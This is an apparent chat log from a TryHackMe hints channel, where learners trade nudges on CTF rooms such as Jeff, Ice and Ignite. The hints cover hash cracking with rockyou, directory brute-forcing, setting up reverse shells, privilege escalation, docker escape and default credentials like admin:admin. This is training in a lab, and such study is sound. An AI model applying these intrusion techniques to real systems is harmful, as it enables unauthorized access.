am i on the correct path.

any genius can pm me.

Hi, im trying to crack the MD4 hash on ccpentesting room, i have ran over the top 10K common passwords, do you need to use wordlist for that excersice?

try rockyou

Rockyou

isnt it on seclists one?

It's there in kali by default

MD4 cracking is fast enough to have large worlists

/usr/share/wordlists/rockyou.txt

locate rockyou.txt

Thanks

might be zipped so unzip it

ya looks like it

is it tar -xzf smth like that

I used gunzip

Thanks.

Jeff nudge plz , i can upload

I guess sometimes md5decrypt.net is faster than hashcat

crackstation

does anyone know what happened to hashkiller?

seems to have been down for ages

has anyone completed the new room "Jeff"? I'v ||burped||, and ||gobustered|| my face off with nothing lol.

Gobuster more

Ty sir

Or try dirsearch

I thought jeff was supposed to be easy once you're on the host machine

It is

Once you’re on the right machine it is

There's more than t****r? 😫

I might or might not try this again tomorrow

@winter plover there are other things to Fuzz with gobuster not just dir's

Ty appreciate it!

@cedar coral

Under learning path web fundamentals, cross-site scripting, I've manage to create an alert like 4 different ways now for task 8 challenge 2, but can't get the flag. Anyone know why?

do need a cow?

after ||bkmgr|| u got any hint? @wraith marsh

Good morning all

(from my side)

I'm working on ICE and need assistance https://tryhackme.com/room/ice

First things first, I recommend you update your metasploit if you're not getting a shell

Task 4 Q 14. I've got a meterpreter connection and i've run getprivs

it outputs 5 privs and none of them are what TryHackMe wants

Did you escalate yet?

No, pre ecsalation

Ahh i see

That question is to be answered once you escalate

got it thanks

I stopped after I got system and just came back to it now. Forgot about that part

I'll try to read more in the future

Hello @native breach, can i send u a msg its about webgramming room?

anyone can give me a hint on how to upload the file to ||ftp|| on jeff?

python, google.

I'm a little confused to get the shell from the room "ignite", anyone know how to get a reverse shell? I already used bash, python, but it didn't work

try downloading something using wget but loading continuously

The box doesn't have access to pastebin

you need to host it on your machine

and pull it from there

ok i will try

also look up "reverse shell cheat sheet"

Payload all the things has a good one

I tried it but it didn't work, is it wrong using ngrok?

I usually try a python rev shell first

since python is usually on the box

Generally either bash,python or netcat will get you a shell

I've tried storing the reverse shell php in a file and host in local then I use ngrok to be publicly accessible, but it doesn't work

You might not have write access to that dir, I can't remember the box. Just try using a python/bash reverse shell instead. and listen on your local machine with netcat

I've never even heard of ngrok

ok brother

but when you do the reverse shell is the local ip from vpn used? @wraith marsh

yes

okok thanks

any help on Jeff.. I got the www-data reverse shell.. and there is an interesting file in the preceeding directory..

Look into that file, see what it contains and see what you can do with the information

I know.. just have to do something with ||ftp|| but how.. or what

Yeah that's what you got to figure out 🙂

If you get really stuck search here

I have already seen all the conversations.. but am lacking the skills.. or what should I search for in google

I have already seen all the conversations.. but am lacking the skills.. or what should I search for in google
@indigo ridge that is something you should never ask

okay

Admittadly, If you've not seen the exploit before you wont get it but it is a fairly common priv esc technique

It's just blind

I am trying.. or else writeup will shed some light

when they are releasing?

Uhh, well my writeup (official) is garbage but I will release community write ups maybe Thursday if there are any. but as it stands now there's 4 roots and 0 writeups submitted

@wraith marsh hint after the ||backupmgr|| shell?

Ehhh, usual enum should find something 😉

I think linpeas should even pick it up

@hasty slate You've done the hard bit, road to root is plain sailing from here 🙂

is ||404: not found|| correct way

uhhhh I don't even remember where that is, but no

ok lol

in shodan.io room task 2nd ques 4th ..anyone help me in that

||ssh||

@wraith marsh Is the step to ||jeff|| a ||bof||?

no

^ same question

Jeff 2 on the other hand

will have a bof

||Heap heap||

||Heap heap||
@tidal sedge Most likely

Maybe I'll get back into THM by then 🤔

i was trying to do bof for sometime now 😦

its much simpler than a bof

1, 2 or 3?

3

why is everything blind in this box!

the part you're at isn't blind, maybe you are? 😛

@wraith marsh are you referring to this exploit? ||https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups/||

no

nope

the room should have a binexp tag though imo

ok cool, because that one ain't workin'

the room should have a binexp tag though imo
@potent vale Theres no binex

@wraith marsh Could we get another hint on how to get the ||backupmgr shell||? I guess there's a ||crontab|| running?

Theres lots of hints in here already, just search 🙂

hello, i have a problem with gaining access on root account in wonderland, i have a problem with 'Permission denied' with using the las command from gtfobins to gain root , it is supposed to be like that? 😋 Nevermind

hello who can help me to privilledg escalation in following room
https://tryhackme.com/room/anonymous

How far have you gotten

i got user.txt

but i can't get root.txt

it was want priviladge escalation

did u run the usual privesc checklist? @hallow talon

yah

then u should have found the interesting files.

did u run the usual privesc checklist? @hallow talon
@hasty slate what check list can u share it?

https://github.com/swisskyrepo/PayloadsAllTheThings

Jeff, im abale to upload ... but what now ? cant call it 😦

@cedar coral Read the hints in this room from the past 24 hours. There's a huge helper in it. And try to decipher JB's first hint.

You definitely aren't able to upload

ooohhh wait never mind ignore me I thought you mean somewhere else.

But yeah like mischka said there plenty of hints in here

wtf i couldn't get anything to upload 🥺

Anyone give me some a hint , what is exactly wordliat to get some password in jeff wp login

no wordlist

enumerate more

No need wordlist ?

no

Or make some wordlist from index

directory bust more

In wp page or begin page ?

First one

In first page

Yeah, the non-wordpress page

Oke i use ||dirbuster|| with ||medium wordlist||

Thanks

@potent vale i just found 4 dir

You can also ||search for files by extension||

finally ||backupmgr@tryharder:~/.ftp/files$ whoami
backupmgr||

Nice 😛

yeah, 👍

Smooth sailing from here @severe wave

thanks @wraith marsh

room biohazard task 4 ques 3 ..anyone pls tell me .. i have completed the whole room except this one..

@wraith marsh Jeff has fallen... 👍 bit frustrating at first, satisfying when the shell popped!

great box, keep up!!

Congratz 🙂 and thank you much appreciated

In room https://tryhackme.com/room/xss on Task8-#3 (The word hello is filtered, bypass it.): I have successfully bypassed the filter and displayed the alert with the message Hello, however, it does not register as a success and no flag is issued. Anyone have any tips or thoughts?

Hey, if anyone did the Plethora room, why does it ask me for creds to login to the dvwa?

admin:admin are the default IIRC

well i guess it is broken

it's*

hi every one, can someone help me? im no nmap room, task 3, item 6

i know the answer is given, but i dont understand why is that.

The script discovered the vuln

That's why that's the answer

Please don't put answers in the hints channel

||https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/|| Here's an article that might help you understand

thank you very much!! how can i hide answers like you did?

||text here||

But this is the hints channel, so if you want more than hints I'd recommend using the help channel(s)

In room https://tryhackme.com/room/xss on Task8-#3 (The word hello is filtered, bypass it.): I have successfully bypassed the filter and displayed the alert with the message Hello, however, it does not register as a success and no flag is issued. Anyone have any tips or thoughts?
@shadow hornet try using something Else then alert

will do, ty

Hey I'm doing the Advent of Cyber room! Currently in the ELK part. According to the first part I need to find the the password. Hope /_search?pretty=true dumps every thing in the ElasticSearch database right?

I've been trying for sometime now. Not getting the password. Am I missing something?

@near vine admin:password

hello, im in ToolsRus #10 and #11. I need to use metasploit to exploit a service that is running in apache tomcat/coyote jsp engine 1.1

when i run the exploit it ends with "exploit completed, but no session was created."

i looked in some places and there is no right answer on why does this happend

anyone has any idea?

@ember mason show us your options. Help us help you. Are you connected to vpn what’s your lhost set to, it should be tun0

let me set it all again

one sec

yes, i'm connected to vpn, lhost is tun0

@ember mason first 2 octets of lhost set to?

also, is it supposed to be a java payload? i havent done that room before so just making sure

192.168

Thing is, im set into a vm

Dont know if that affects

That's not tun0

Run the VPN in the VM

Tried another payloads and its the same

Oh... Okey. I'll try it in a moment. Having dinner

Thank you for the quick answer

Could someone help me with Task #6 Question #9 in the Burp Suite room?

I have successfully answered all other questions but i can not figure this one out

Could someone help me with Task #6 Question #9 in the Burp Suite room?

I have successfully answered all other questions but i can not figure this one out
@pallid siren look to the right to where you found ||url||

Hey Guys,
Idk if this is where I can get a hint. I am stuck on Task 4 and 13 I was wondering if I may get a hint on where to look. For task 4 I’ve used netstat, Firewall, and Event Logs. However, no luck.

Run the VPN in the VM
@stuck fractal yes, it was that. Thank you

@ember mason is Run the VPN for me?

nope, it was a question about metasploit. Sorry the confusion

Is there anyone that is oding Jeff as I have a question regarding the ftp?Can you PM me please

?

Gah! I can upload files to jeff from the shell, but I can't find where they're uploading to

They are not exposed

Oh ._.

I was hoping I could find the fi* folder somewhere :p

You can search for hints in this channel. ||It's a Linux - Privilege Escalation||

I am seriously tempted to attempt jeff now

Hi, i'm in plethora exactly in OWASP JuiceShop. I get stucked and i don't know how to continue

I think thats broken @white salmon You'll have to root the host first and drop into a docker shell to get that flag

Ok...

I will do VulnBank and then ||hack the machine, escalate privileges and i don't know how get the docker shell ||

Thanks you, JB

Network Services room - I've finished everything except one question of the SMB section (Q8).

@fluid field walks you through it, you should be able to just read those directions and follow it

what are you having an issue with/what kind of hint are you looking for

anyone could help me with jeff? got a shell but ||stucked in a container||

I've tried the following - ||ssh -i id_rsa John@10.10.30.114|| and repeated for other usernames I can think of, but no luck

what happens when you run that?

Wrong username @fluid field

what happens when you run that?
@oblique cliff asks me for a password, so therefore I assume that the private key id_rsa isn't correct

yea what JB said

hahah got him! thanks @oblique cliff @wraith marsh

Hey guys, seriously what’s the trick behind reverse shells? Why they never work for me? How to pick the right port?

1. The command you're trying to run might use a program that doesn't exist on the VM
2. Usually you'd pick an easy to recognize port like 4444 or 9999 but anything above 1024 would be good because root isn't needed
3. Are you connecting to the VPN on a host os and listening in a kali vm or something? If yes then connect to the VPN on the VM. You're listening on a port that isn't accessible outside your internal vm network

This is the last thing I'll ask about Jeff: Will I kick myself when I figure how to ||break out the container||? 😂

yes

its a common linux priv esc

it's just blind

||su|| without password?
Going insane on this box

oh, speaking of jeff

i have a question for you jb

there was an IP on the internal network with 3306 open. was that just a rabbit hole/red herring?

Thats the container for mysql database for wp

ah right, it needs one

I couldn't be arsed to make my own image so just done docker pull wordpress

big mistake that was

lmao

@wooden mist writeup when

ye

i might start it today

I still haven't set up my blog to release mine

give me yours and i'll release it

mine is awful

mine will be too

can anyone help me with intro to x86 last question, crackme2

#room-help

Is this a kind of coded message or something?
I am currently in the room "Learn Linux" and this is task number 11, for anyone wondering.
Your help would be greatly appreciated :).

That's an ELF binary, you're not meant to cat the contents of it

Ok, so I created the noot.txt file, now it says I am supposed to run it but when I type ./noot.txt, it says Permission denied, so I decide I must sudo ./noot.txt and I type the password (which is supposed to be "shiba1") and I get this message : shiba1 is not in the suoders file. This incident will be reported.
I hope you can help...

Give the file executable permissions

hi, im doing intro to python and im stuck at decoding the second base32 it shows an error non base32 string found can someone help me

Outermost layer is base16

yes i know

Decode it 5 times with base16

can anyone help me with intro to x86 last question, crackme2
@tribal ginkgo go on.

@white salmon Wait, why are you trying to run a txt file? 🤔

@stuck fractal i did but at second for loop it shows me this error

@slender umbra if you want more than a hint, wrong channel

You're probably doing the first decode loop wrong

okay i will do some more research then, thank you so much

@tidal sedge Let le show you why

Give the file executable permissions
@tidal sedge What does this mean, and how could I do that?

Ignore that message, you need to create a file named noot.txt

which I think you did

Then run the shiba1 binary

Ok, I'll try this

Thanks @tidal sedge, it worked!!

can anyone help me with intro to x86 last question, crackme2
@tribal ginkgo just ask, don't ask for help, if anyone could, then one will definitely help you out.

hey im trying to solve Jeff i got a rev shell but i cant seem to find the user flag any ideas

Hi, how is it possible to extract info from /root/root.txt?

wat

Let's say that I need to get a flag from /root/root.txt

So you need to get root access.

Basically. There is several users without root privileges.

I'm going to guess you're doing Learn Linux

Yup

There is one user that has sudo rights

Yeah

so I need to get access to that one specific root user?

That's not the root user

The root user is a user on it's own

oh, I mean, who has sudo rights

My bad

Not root...a user who has sudo rights

sudo is soooo 2019

😉

Lmao

Find that user, and continue further

Right. I tried a few, but neither su or sudo worked. Neither of them are in sudoers list. Guess I will try a bit more, thanks anyways

Good luck man. Hope you're having fun

In a matter of fact, I do, thank you

in jeff i am getting connection time out while ||@ftp|| like this ||@ftp = FTP('172.20.0.1')
ftp.login('backupmgr'||

am i on wrong path or missing somthing.

are you running that from inside the box?

also why ||@ftp||

yup inside ||docker|| i guess.

also why ||@ftp||
@wooden mist sorry, just a typo

ignore '@'

try connecting to it with ||ftp = FTP('IP', 'username', 'password')||

ftp.login should work

I used the php which was there already.

Haha a few people did, I left it broken on purpose

Whatever works I guess 🤷‍♂️

Haha a few people did, I left it broken on purpose
@wraith marsh broken, it that you ?

was that for me ? you did it intentionally ?

JB created the room

The comment was about the || PHP script || it doesn't work as it sits on the box. || I left there just for the info inside ||

hmmmm okays.

JB created the room
@stuck fractal impressive work @wraith marsh

I used the php which was there already.
@hasty slate can u have a look on the ||php|| i gave you.

getting long time outs in ||python||

try connecting to it with ||ftp = FTP('IP', 'username', 'password')||
@wooden mist same, time outs

reboot the machine then i guess

Probably forgot something in the python for the || mode ||

I have question regarding jeff, maybe it's linux question but atleast faced it when doing jeff.
So I uploaded some static binaries, when I used /dev/shm it said permission denied, when I put it in /var/www/html it worked.

||i know the mount points for that docker container|| but don't exactly know why this happened, can anyone explain?

that's because it's mounted as noexec

AHAHHAHA thanks @rain oasis . can't believe i missed that

That wasn’t me, I just docker pulled the image

I don't see any other solutions, any hints? 🤔
Room : Learn Linux
Task : number 18

You're logged in as the wrong user

You got credentials for the next user, you need to log in as them

Dang it!

How could I be so dumb!

Yeah, I turned my PC off and I forgot to login again, mb x)

Btw, since we're here, is it normal that my deployed machine is really slow? Could it be because of my internet connexion?

It's not normally slow, and potentially.

Ok, cause my inputs will sometimes take like 30 seconds to be typed

and sometimes it's quasi instantaneous

Hey I am currently doing the toolsrus room on the complete beginner path and my metasploit wont create a session, even though all options are correctly set, any ideas?

Can you please share your Metasploit settings in a screenshot please?

@stuck fractal Hello again, how can i jump into a docker shell?

@white salmon Please don't just tag me when you need help

Hi Fab.

Can you share your entire settings please?

Use show options

I'm guessing it is HTTPS reverse handler.

If you're looking for the Juice Shop flag, your hint is the files exist on the system file system and are named pretty predictably @white salmon

And we will need to change your payload.

But also a wrong LHOST

a got it already, thanks all 🙂

/var/lib/docker?

I wanna say somethingFS?

use find

find makes it ez

Doesn't work

Did for me

forget it

i'm stupid

Thanks

I finished

Don't beat yourself up

@potent vale hii bro i found some directory ||src directory|| but i tried enum all extension in ||src directory|| not found anything - jeff room -

hey guys does anybody know how to get ssh username by smb?

@bright pine if you have a question about a specific room and would like a hint here is good but please be more specific and say which room and task you’re on

If you want more than a hint head over to #room-help

If this is just a general question please ask in #general 🙂

thanks

Need hint for extension on jeff room

I just found ||encoder||

@sick sun enum a bit more.... for maybe other directories..

have u rooted jeff @mild eagle

@atomic shuttle yes.

@mild eagle ||src_code|| ?

for jeff am i supposed to get anything from ||ftp location|| because all i am getting ||a files folder|| and nothing.

@keen willow ||no, you need to put instead of get||

@sick sun enumerate for other folders

can i pm you @potent vale . Stuck on putting files into|| ftp dir. ||.

@atomic shuttle sure

Hey guys I'm doing the nmap rp room

Task 3 #5
Help pls

If you want help go to #room-help

If you want a hint you’re going to need more detail